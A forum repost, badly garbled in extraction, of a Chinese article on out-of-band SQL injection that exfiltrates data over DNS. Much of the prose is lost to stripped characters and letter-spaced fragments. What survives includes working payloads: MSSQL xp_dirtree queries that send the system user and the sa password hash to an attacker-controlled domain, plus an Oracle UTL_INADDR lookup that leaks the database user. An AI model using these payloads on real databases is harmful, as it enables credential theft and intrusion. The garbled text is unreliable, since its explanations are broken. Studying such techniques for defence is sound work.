[11528] 2017-07-04_OOB(outofband)分析系列之DNS渗漏

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2017-07-04_OOB(outofband)分析系列之DNS渗漏 O O B o u t   o f   b a n d D N S   F r e e B u f   2 0 1 7 - 0 7 - 0 4 * F r e e B u f S Q L w e b s q l m a p s q l s q l s q l 西 西 Q Q : 1 4 7 8 0 2 3 4 8 8 . O O B S Q L 5 3 o u t   o f   b a n d O O B i n b a n d i n b a n d w e b E r r o r - b a s e d   S Q L   i n j e c t i o n E r r o r - b a s e d   S Q L   i n j e c t i o n i n b a n d w e b i n f e r e n c e w e b B o o l e a n - b a s e d   b l i n d   S Q L   i n j e c t i o n S t a c k e d   q u e r i e s   S Q L i n j e c t i o n   w e b ( p h p P D O P D O S Q L u p d a t e s l e e p i n f e r e n c e ) M e t h o d r e q u e s t s T i m e B o o l e a n - b a s e d   b l i n d 2 9 , 2 1 2 2 1 4 . 0 4 T i m e - b a s e d   ( 1   s e c ) 3 2 , 7 1 6 1 7 , 7 2 0 . 5 1 E r r o r - b a s e d 7 7 7 9 . 0 2 U n i o n   ( f u l l / p a r t i a l ) 3 / 1 3 6 0 . 7 0 / 2 . 5 0 D N S   e x f i l t r a t i o n 1 , 4 0 9 3 5 . 3 1 O O B D N S i n b a n d i n f e r e n c e O O B
D N S D N S N S N S N S w i n U N C ( U n i v e r s a l - N a m i n g - C o n v e n t i o n ) U N C w i n i p w i n d n s i p d n s d n s m y s q l + w i n w i n m s s q l 4 : x p _ g e t f i l e d e t a i l s M i c r o s o f t   S Q L   S e r v e s   2 0 0 0 x p _ f i l e e x i s t x p _ d i r t r e e x p _ s u b d i r s d n s 使 : d e c l a r e   @ x i a o z e   c h a r ( 1 2 8 ) ; s e t   @ x i a o z e = + s y s t e m _ u s e r + . x i a o z e . c o m . ; e x e c   m a s t e r . . x p _ d i r t r e e   @ x i a o z e s a h a s h 使 : d e c l a r e   @ x i a o z e   v a r c h a r ( 1 2 8 ) ; s e l e c t   @ h o s t = + ( s e l e c t   t o p   1 m a s t e r . d b o . f n _ v a r b i n t o h e x s t r ( p a s s w o r d _ h a s h ) f r o m   s y s . s q l _ l o g i n s   w h e r e   n a m e = s a ) + . x i a o z e . c o m . ; e x e c   m a s t e r . . x p _ d i r t r e e   @ x i a o z e ; 使 M i c r o s o f t   S Q L   S e r v e s   2 0 0 0 w i n U N C D N S n s i p m s s q l m y s q l d n s O r a c l e O r a c l e m s s q l 使 U T L _ I N A D D R P L / S Q L w h e r e a d m i n . x i a o z e . c o m t o p s x i a o z e . c o m a d m i n . x i a o z e . c o m
O r a c l e : s e l e c t   *   f r o m   x i a o z e   w h e r e   l m z = U T L _ I N A D D R . G E T _ H O S T _ A D D R E S S ( ( S E L E C T   U S E R   F R O M   D U A L ) | | . x i a o z e . c o m M y S Q L P o s t g r e S Q L U N C D N S U N C 1 2 8 1 2 8 d n s 1 6 m s s q l 1 6 : s q l , s a u n i c o d e 1 6 1 2 8 1 2 8 1 2 8 1 2 8 6 3 3 T C P / I P 1 : ( ) 1 4 6 1 4 - 6 6 3 : d e c l a r e   @ x i a o z e   c h a r ( 1 2 8 ) ; s e l e c t   @ x i a o z e = + m a s t e r . d b o . f n _ v a r b i n t o h e x s t r ( C A S T ( S U B S T R I N G ( ( S E L E C T   T O P   1 C A S T ( X i a o Z e   A S   c h a r ( 2 5 5 ) )   F R O M   L M Z ) , 1 , 2 6 )   A S V A R B I N A R Y ( 2 5 5 ) ) ) + . X i a o Z e L o v e L M Z . c o m . ; E X E C   m a s t e r . . x p _ d i r t r e e   @ x i a o z e ; d n s O O B i c m p h t t p * F r e e B u f f n _ v a r b i n t o h e x s t r s e l e c t   m a s t e r . d b o . f n _ v a r b i n t o h e x s t r ( c a s t ( S Y S T E M _ U S E R   a s   V A R B I N A R Y ) ) 0 x 7 3 0 0 6 1 0 0 c o m . c o m f n _ v a r b i n t o h e x s t r s u b s t r i n g

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则